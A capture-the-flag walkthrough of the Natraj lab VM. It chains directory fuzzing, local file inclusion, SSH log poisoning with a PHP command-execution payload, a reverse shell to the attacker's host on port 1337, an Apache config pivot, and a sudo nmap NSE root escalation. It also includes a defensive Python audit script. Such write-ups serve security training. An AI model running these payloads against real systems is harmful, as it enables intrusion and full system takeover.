Natraj
Port recognition with nmap
┌──(root@ghost)-[/home/ghost]
└─# nmap -v -p- --open --min-rate 5000 natraj.vuln -sV
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-21 11:20 EST
NSE: Loaded 45 scripts for scanning.
Initiating ARP Ping Scan at 11:20
Scanning natraj.vuln (10.0.2.53) [1 port]
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
MAC Address: 08:00:27:BF:A5:2E (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
nmap reports two open ports: 22 (ssh, OpenSSH 7.6p1) and 80 (http, Apache 2.4.29).
┌──(root@ghost)-[/home/ghost]
└─# wfuzz -t 100 -c -w /usr/share/dirb/wordlists/common.txt --hc=404 http://natraj.vuln/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://natraj.vuln/FUZZ
Total requests: 4614
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000011: 403 9 L 28 W 276 Ch ".hta"
000000001: 200 182 L 1767 W 14497 Ch "http://natraj.vuln/"
000001007: 301 9 L 28 W 312 Ch "console"
000001991: 301 9 L 28 W 311 Ch "images"
000002020: 200 182 L 1767 W 14497 Ch "index.html"
000000013: 403 9 L 28 W 276 Ch ".htpasswd"
000000012: 403 9 L 28 W 276 Ch ".htaccess"
000003588: 403 9 L 28 W 276 Ch "server-status"
Fuzzing directories we found console; visiting http://natraj.vuln/console/ shows a file.php that appears empty, which suggests it expects a parameter. So we fuzz the parameter name instead, using --hh=0 to hide the empty responses that every wrong name produces:
┌──(root@ghost)-[/home/ghost]
└─# wfuzz -t 100 -c -w /usr/share/dirb/wordlists/common.txt --hc=404 --hh=0 http://natraj.vuln/console/file.php?FUZZ=/etc/passwd
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://natraj.vuln/console/file.php?FUZZ=/etc/passwd
Total requests: 4614
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000001601: 200 27 L 35 W 1398 Ch "file"
Only the parameter name "file" returns content (1398 characters instead of an empty page), so file.php?file= is vulnerable to Local File Inclusion. Confirming with /etc/passwd and listing the accounts that have a login shell:
┌──(root@ghost)-[/home/ghost]
└─# curl -s http://natraj.vuln/console/file.php?file=/etc/passwd | grep 'sh$'
root:x:0:0:root:/root:/bin/bash
natraj:x:1000:1000:natraj,,,:/home/natraj:/bin/bash
mahakal:x:1001:1001:,,,:/home/mahakal:/bin/bash
┌──(root@ghost)-[/home/ghost]
└─# python3 lfienum "http://natraj.vuln/console/file.php?file="
...
> http://natraj.vuln/console/file.php?file=/var/log/auth.log
[Response Code]: 200
[Content Lenght]: 12388
[Content Lines]: 131
Jun 3 09:41:14 ubuntu systemd-logind[434]: New seat seat0.
Jun 3 09:41:14 ubuntu systemd-logind[434]: Watching system buttons on /dev/input/event0 (Power Button)
Jun 3 09:41:15 ubuntu sshd[457]: Server listening on 0.0.0.0 port 22.
Jun 3 09:41:15 ubuntu sshd[457]: Server listening on :: port 22.
Jun 3 09:41:15 ubuntu systemd-logind[434]: Watching system buttons on /dev/input/event1 (AT Translated Set 2 keyboard)
Jun 3 09:41:47 ubuntu sshd[612]: Accepted password for natraj from 192.168.1.103 port 49859 ssh2
Jun 3 09:41:47 ubuntu sshd[612]: pam_unix(sshd:session): session opened for user natraj by (uid=0)
Jun 3 09:41:47 ubuntu systemd-logind[434]: New session 1 of user natraj.
Jun 3 09:41:47 ubuntu systemd: pam_unix(systemd-user:session): session opened for user natraj by (uid=0)
Jun 3 09:41:59 ubuntu sudo: natraj : TTY=pts/0 ; PWD=/home/natraj ; USER=root ; COMMAND=/bin/bash
...
After enumerating with lfienum we found that /var/log/auth.log is readable through the inclusion (normally it is root:adm 0640 and www-data could not read it). sshd writes every authentication attempt to that file, including the username the client supplied, and PHP executes whatever it includes. That gives us log poisoning: log in over SSH with a PHP tag as the username so it lands in auth.log, then include the log with a cmd parameter to run commands as the web server user.
┌──(root@ghost)-[/home/ghost]
└─# python3 lfi2rce "http://natraj.vuln/console/file.php?file=" ssh 10.0.2.43 1337
lfi2rce - Local File Inclusion To Remote Code Execution v1.0 by 0bfxgh0st*
💀 Poison /var/log/auth.log
💀 Sending payload
<?php system($_GET["cmd"]); ?>@natraj.vuln's password:
Permission denied, please try again.
<?php system($_GET["cmd"]); ?>@natraj.vuln's password:
Permission denied, please try again.
<?php system($_GET["cmd"]); ?>@natraj.vuln's password:
<?php system($_GET["cmd"]); ?>@natraj.vuln: Permission denied (publickey,password).
listening on [any] 1337 ...
connect to [10.0.2.43] from natraj.vuln [10.0.2.53] 51474
bash: cannot set terminal process group (507): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/html/console$
I made this RCE PoC for some log poisoning cases: lfi2rce
www-data@ubuntu:/var/www/html/console$ find / -writable 2>/dev/null | grep -v 'proc\|lib\|dev\|run\|sys'
/tmp
/etc/apache2/apache2.conf
/var/www/html
/var/tmp
/var/lock
/var/cache/apache2/mod_cache_disk
www-data@ubuntu:/var/www/html/console$ ls -la /etc/apache2/apache2.conf
-rwxrwxrwx 1 root root 7224 Mar 13 2020 /etc/apache2/apache2.conf
After searching the whole filesystem for writable files and filtering out the usual noise, /etc/apache2/apache2.conf stands out: it is owned by root but world-writable (-rwxrwxrwx), so www-data can rewrite the web server's configuration.
www-data@ubuntu:/var/www/html/console$ nano /etc/apache2/apache2.conf
...
# These need to be set in /etc/apache2/envvars
User ${APACHE_RUN_USER}
Group ${APACHE_RUN_GROUP}
...
Change the User and Group directives from those variables to the user we want to become:
# These need to be set in /etc/apache2/envvars
User mahakal
Group mahakal
NOTE: The new User and Group only take effect when Apache restarts, and www-data cannot restart the service, so to pivot from www-data to mahakal you need to reboot the Natraj virtual machine manually. Before the reboot we could also drop a PHP reverse shell into /var/www/html/ (which is writable too) to get a shell back immediately afterwards, but I will use lfi2rce to reconnect again.
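An added example, not from the original write-up, that shows why this edit works and how to check a host for the same weakness: it resolves User/Group the way httpd does (expanding ${APACHE_RUN_USER} from envvars) and flags a configuration that unprivileged users can write. The sample config texts, the temp-dir demo and the function names are constructed for illustration; the file paths are the Debian/Ubuntu defaults:

```python
"""Audit helper for the Apache User/Group pivot (added example, not from the post).

Answers two questions: which account does Apache drop to once apache2.conf and
/etc/apache2/envvars are resolved, and can an unprivileged local user change
that decision? Sample texts below are constructed to mirror the box.
"""
import os
import re
import stat
import tempfile
from typing import Dict, List, Optional

# Constructed sample inputs (not copied from the box).
ENVVARS_SAMPLE = """\
# envvars - default environment variables for apache2ctl
unset HOME
export APACHE_RUN_USER=www-data
export APACHE_RUN_GROUP=www-data
"""
CONF_STOCK = """\
# These need to be set in /etc/apache2/envvars
User ${APACHE_RUN_USER}
Group ${APACHE_RUN_GROUP}
"""
CONF_PIVOTED = """\
# These need to be set in /etc/apache2/envvars
User mahakal
Group mahakal
"""

ENVVAR_RE = re.compile(r'^\s*(?:export\s+)?(APACHE_RUN_(?:USER|GROUP))=["\']?([^"\'\s]+)')
DIRECTIVE_RE = re.compile(r"^\s*(User|Group)\s+(\S+)", re.IGNORECASE)
VAR_RE = re.compile(r"\$\{([A-Za-z_][A-Za-z0-9_]*)\}")
SERVICE_ACCOUNTS = ("www-data", "apache", "httpd", "nobody")


def parse_envvars(text: str) -> Dict[str, str]:
    """Pick APACHE_RUN_USER/GROUP out of the shell-style envvars file."""
    env: Dict[str, str] = {}
    for line in text.splitlines():
        m = ENVVAR_RE.match(line)
        if m:
            env[m.group(1)] = m.group(2)
    return env


def effective_identity(conf_text: str, env: Dict[str, str]) -> Dict[str, Optional[str]]:
    """Resolve User/Group as httpd sees them: ${VAR} expanded from envvars
    (unset variables are left as-is so the mismatch is visible), last wins."""
    ident: Dict[str, Optional[str]] = {"User": None, "Group": None}
    for line in conf_text.splitlines():
        m = DIRECTIVE_RE.match(line)
        if m:
            value = VAR_RE.sub(lambda v: env.get(v.group(1), v.group(0)), m.group(2))
            ident[m.group(1).capitalize()] = value
    return ident


def writable_by_others(path: str) -> bool:
    """True if group or world can write the file (the 0777 case on the box)."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit(conf_path: str, envvars_path: str) -> List[str]:
    """Return human-readable findings; an empty list means nothing alarming."""
    findings: List[str] = []
    with open(envvars_path) as f:
        env = parse_envvars(f.read())
    with open(conf_path) as f:
        ident = effective_identity(f.read(), env)
    for path in (conf_path, envvars_path):
        if writable_by_others(path):
            findings.append(f"{path} is group/world-writable: any local user can point "
                            "User/Group at another account and httpd, which starts as "
                            "root, switches to it on the next restart")
    for key, value in ident.items():
        if value is None:
            findings.append(f"no {key} directive; httpd uses its compiled-in default")
        elif "${" in value:
            findings.append(f"{key} {value} references a variable envvars does not set")
        elif value == "root":
            findings.append(f"{key} root: httpd refuses this unless built with -DBIG_SECURITY_HOLE")
        elif value not in SERVICE_ACCOUNTS:
            findings.append(f"{key} is {value!r}, not a dedicated service account")
    return findings


def demo(conf_text: str = CONF_PIVOTED, conf_mode: int = 0o777) -> List[str]:
    """Write the constructed samples to a temp dir and audit them; the defaults
    reproduce the box after the pivot (world-writable config naming mahakal)."""
    with tempfile.TemporaryDirectory() as d:
        conf, envvars = os.path.join(d, "apache2.conf"), os.path.join(d, "envvars")
        with open(conf, "w") as f:
            f.write(conf_text)
        with open(envvars, "w") as f:
            f.write(ENVVARS_SAMPLE)
        os.chmod(conf, conf_mode)
        os.chmod(envvars, 0o644)
        return audit(conf, envvars)


if __name__ == "__main__":
    for finding in demo():
        print("[!]", finding)
```

Note the limit of this pivot: httpd is started as root and will switch to any account named in User/Group, but it refuses to keep running as root itself unless it was built with -DBIG_SECURITY_HOLE, which is why the write-up goes through mahakal rather than straight to root.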
Rebooting the Natraj VM manually...
┌──(root@ghost)-[/home/ghost]
└─# python3 lfi2rce "http://natraj.vuln/console/file.php?file=" ssh 10.0.2.43 1337
lfi2rce - Local File Inclusion To Remote Code Execution v1.0 by 0bfxgh0st*
💀 Poison /var/log/auth.log
💀 Sending payload
<?php system($_GET["cmd"]); ?>@natraj.vuln's password:
Permission denied, please try again.
<?php system($_GET["cmd"]); ?>@natraj.vuln's password:
Permission denied, please try again.
<?php system($_GET["cmd"]); ?>@natraj.vuln's password:
<?php system($_GET["cmd"]); ?>@natraj.vuln: Permission denied (publickey,password).
listening on [any] 1337 ...
connect to [10.0.2.43] from natraj.vuln [10.0.2.53] 51474
bash: cannot set terminal process group (507): Inappropriate ioctl for device
bash: no job control in this shell
mahakal@ubuntu:/var/www/html/console$ whoami
mahakal
mahakal@ubuntu:/var/www/html/console$
And now we are the mahakal user: Apache drops privileges to the User and Group named in its configuration, so the same poisoned include now executes as mahakal.
mahakal@ubuntu:/var/www/html/console$ sudo -l
Matching Defaults entries for mahakal on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User mahakal may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/nmap
mahakal@ubuntu:/var/www/html/console$ /usr/bin/nmap --version
Nmap version 7.60 ( https://nmap.org )
We can run nmap as root through sudo without a password. This nmap 7.60 no longer has the old --interactive mode, but NSE scripts are Lua and can call os.execute, so a one-line script file is enough to escalate.
┌──(root@ghost)-[/home/ghost]
└─# python3 gtfobins.py nmap
[Sudo]
If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.
Input echo is disabled.
TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo nmap --script=$TF
The interactive mode, available on versions 2.02 to 5.21, can be used to execute shell commands.
sudo nmap --interactive
nmap> !sh
We found some useful payloads at https://gtfobins.github.io/gtfobins/nmap/#sudo
You can find gtfobins.py script in https://github.com/0bfxgh0st/gtfobins-webcrawler
mahakal@ubuntu:/var/www/html/console$ TF=$(mktemp)
mahakal@ubuntu:/var/www/html/console$ echo 'os.execute("/bin/sh")' > $TF
mahakal@ubuntu:/var/www/html/console$ sudo nmap --script=$TF
Starting Nmap 7.60 ( https://nmap.org ) at 2022-12-21 09:44 PST
NSE: Warning: Loading '/tmp/tmp.vnuCQ2MsJl' -- the recommended file extension is '.nse'.
whoami
root
cat /root/root.txt
███▄▄▄▄ ▄████████ ███ ▄████████ ▄████████ ▄█
███▀▀▀██▄ ███ ███ ▀█████████▄ ███ ███ ███ ███ ███
███ ███ ███ ███ ▀███▀▀██ ███ ███ ███ ███ ███
███ ███ ███ ███ ███ ▀ ▄███▄▄▄▄██▀ ███ ███ ███
███ ███ ▀███████████ ███ ▀▀███▀▀▀▀▀ ▀███████████ ███
███ ███ ███ ███ ███ ▀███████████ ███ ███ ███
███ ███ ███ ███ ███ ███ ███ ███ ███ ███
▀█ █▀ ███ █▀ ▄████▀ ███ ███ ███ █▀ █▄ ▄███
███ ███ ▀▀▀▀▀▀
!! Congrats you have finished this task !!
Contact us here:
Hacking Articles : https://twitter.com/rajchandel/
Geet Madan : https://www.linkedin.com/in/geet-madan/
+-+-+-+-+-+ +-+-+-+-+-+-+-+
|E|n|j|o|y| |H|A|C|K|I|N|G|
+-+-+-+-+-+ +-+-+-+-+-+-+-+
__________________________________